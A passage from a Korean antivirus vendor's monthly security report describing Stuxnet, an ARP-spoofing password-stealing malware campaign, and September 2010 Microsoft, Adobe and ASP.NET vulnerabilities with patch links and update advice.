<Stuxnet 악성코드가발견된이란부쉐르 (Bushehr) 원자력발전소 > < 지멘스 (Siemens) Simatic WinCC 기반 SCADA 프로그램및 Bitdefender 전용백신 > 온라임계정비밀번호를훔치는 ARP Spoofing 악성코드유행 2007~2008년사이에크게유행했던 ARP Spoofing 공격이다시유행하고있습니다. 10월현재까지도악성코드제작자가지속적인변종을유포하고있는상황입니다. 하지만, 이번에 ARP Spoofing을실행하는악성코드는인터넷익스플로러 (IE) 취약점에대한패치설치와최신버전의백신으로충분히예방할수있습니다. 알약보안공지 : http://alyac.altools.co.kr/securitycenter/analysis/noticeview.aspx?id=58 < 악성코드감염 PC 에서과도한 ARP Reply 패킷이발생하는화면 > <ARP Reply 패킷으로인해잘못된 MAC 주소로변경되는화면및알약전용백신 > 페이지 14

Part Ⅱ 9 월의이슈돋보기 2. 9 월의취약점이슈 Microsoft 9월정기보안업데이트윈도우취약점 ( 프린터스풀러서비스, MPEG-4 코덱, 유니코드스크립트프로세서등 ) 으로원격코드실행문제점과 MS 아웃룩, IIS 서버, Active Directory 취약점으로인한원격코드실행문제점등을해결한 Microsoft 9월정기보안업데이트를발표하였습니다. < 해당제품 > Windows XP, Server 2003~2008 Windows Vista, Windows 7 Microsoft Office XP - Outlook 2002 IIS(Internet Information Server) 5.1~7.5 < 취약점목록 > [MS10-061] 인쇄스풀러서비스의취약점으로인한원격코드실행문제점 [MS10-062] MPEG-4 코덱의취약점으로인한원격코드실행문제점 [MS10-063] Unicode Scripts Processor의취약점으로인한원격코드실행문제점 [MS10-064] Microsoft Outlook의취약점으로인한원격코드실행문제점 [MS10-065] Microsoft IIS( 인터넷정보서비스 ) 의취약점으로인한원격코드실행문제점 [MS10-066] 원격프로시저호출의취약점으로인한원격코드실행문제점 [MS10-067] 워드패드텍스트변환기의취약점으로인한원격코드실행문제점 [MS10-068] 로컬보안기관하위시스템서비스의취약점으로인한권한상승문제점 [MS10-069] Windows CSRSS(Client/Server Runtime Subsystem) 의취약점으로인한권한상승문제점 < 해결책 > Windows Update를수행하거나 Microsoft 보안공지요약사이트에서해당취약점들의개별적인패치파일을다운로드받을수있습니다. 한글 : http://www.microsoft.com/korea/technet/security/bulletin/ms10-sep.mspx 영문 : http://www.microsoft.com/technet/security/bulletin/ms10-sep.mspx Adobe Acrobat/Flash 계열제품보안업데이트권고 Adobe Acrobat/Flash 계열의제품군에대한코드실행관련취약점을패치하는보안업데이트가발표되었습니다. 공격자는해당취약점을악용하여영향받는소프트웨어를비정상적으로종료시키거나, 임의의명령을실행하여시스템에대한권한획득할수있습니다. 낮은버전의 Adobe Flash Player/Adobe Air 사용으로악성코드감염등의사고가발생할수있으므로사용자의주의및최신버전설치를권고합니다. 페이지 15

< 해당제품 > - Adobe Acrobat / Reader 9.3.4 이하버전 (Windows, Mac OS, Unix) < 취약점목록 > CVE-2010-2883 : This update resolves a font-parsing input validation vulnerability that could lead to code execution Note: There are reports that this issue is being actively exploited in the wild. CVE-2010-2884 : This update resolves a memory corruption vulnerability in the authplay. dll component that could lead to code execution. CVE-2010-2887 : This update resolves multiple potential Linux-only privilege escalation issues CVE-2010-2888 : This update resolves multiple input validation errors that could lead to code execution (Windows, ActiveX only) CVE-2010-2889 : This update resolves a font-parsing input validation vulnerability that could lead to code execution. CVE-2010-2890 : This update resolves a memory corruption vulnerability that could lead to code execution. CVE-2010-3619 : This update resolves a memory corruption vulnerability that could lead to code execution. CVE-2010-3620 : This update resolves an image-parsing input validation vulnerability that could lead to code execution. CVE-2010-3621 : This update resolves a memory corruption vulnerability that could lead to code execution. CVE-2010-3622 : This update resolves a memory corruption vulnerability that could lead to code execution. CVE-2010-3623 : This update resolves a memory corruption vulnerability that could lead to code execution (Macintosh platform only) CVE-2010-3624 : This update resolves an image-parsing input validation vulnerability that could lead to code execution (Macintosh platform only) CVE-2010-3625 : This update resolves a prefix protocol handler vulnerability that could lead to code execution CVE-2010-3626 : This update resolves a font-parsing input validation vulnerability that could lead to code execution. CVE-2010-3627 : This update resolves an input validation vulnerability that could lead to code execution. CVE-2010-3628 : This update resolves a memory corruption vulnerability that could lead to code execution. CVE-2010-3629 : This update resolves an image-parsing input validation vulnerability that could lead to code execution. 페이지 16

CVE-2010-3630 : This update resolves a denial of service vulnerability; arbitrary code execution has not been demonstrated, but may be possible. CVE-2010-3631 : This update resolves an array-indexing vulnerability that could lead to code execution (Macintosh platform only) CVE-2010-3632 : This update resolves a memory corruption vulnerability that could lead to code execution. CVE-2010-3658 : This update resolves a memory corruption vulnerability that could lead to code execution. This update resolves a denial of service issue (CVE-2010-3656). This update resolves a denial of service issue (CVE-2010-3657). < 해결책 > Adobe Flash와 Acrobat 계열제품을 Adobe 홈페이지에서최신으로업데이트하거나개별패치를다운로드하여설치합니다. (Adobe Reader : http://get.adobe.com/kr/reader/) < 참고사이트 > http://www.adobe.com/support/security/bulletins/apsb10-021.html ASP.NET Padding Oracle 취약점에대한보안패치발표이번취약점을악용해웹서버의암호화된데이터나시스템정보를공격자가획득할수있으며, 실제로공격피해가보고되고있습니다. Microsoft에서는 ASP.NET Padding Oracle 취약점에대해 Critical 아래의 Important로규정하고있으나실제공격이발생하고있는점을감안해비정기보안패치를발표하였습니다. 취약점 : CVE-2010-3322, MS10-070 < 해당제품 > Windows XP/Vista/7, Windows 2003~2008 Server,.NET Framework 1.1~4.0 < 취약점설명 > ASP.NET 프레임워크가악의적으로조작된데이터를처리하는과정에서 ViewState필드와같은암호화된데이터나 Web.config와같은설정파일의내용을노출시키는문제점이발견되었습니다. 이에 Microsoft에서는취약점을해결하는비정기보안패치를발표하였으므로 Windows 기반의웹서버에보안패치설치를권고합니다. < 해결책 > Windows Update를수행하거나 Microsoft 보안공지요약사이트에서해당취약점들의파일을다운로드받을수있습니다. (Windows Update는 10월 12일부터시행 ) < 참고사이트 > 영문 : http://www.microsoft.com/technet/security/bulletin/ms10-070.mspx 페이지 17

Contact us 이스트소프트알약보안대응팀 Tel : 02-881-2364 E-mail : help@alyac.co.kr : 알약사이트 : www.alyac.co.kr 페이지 18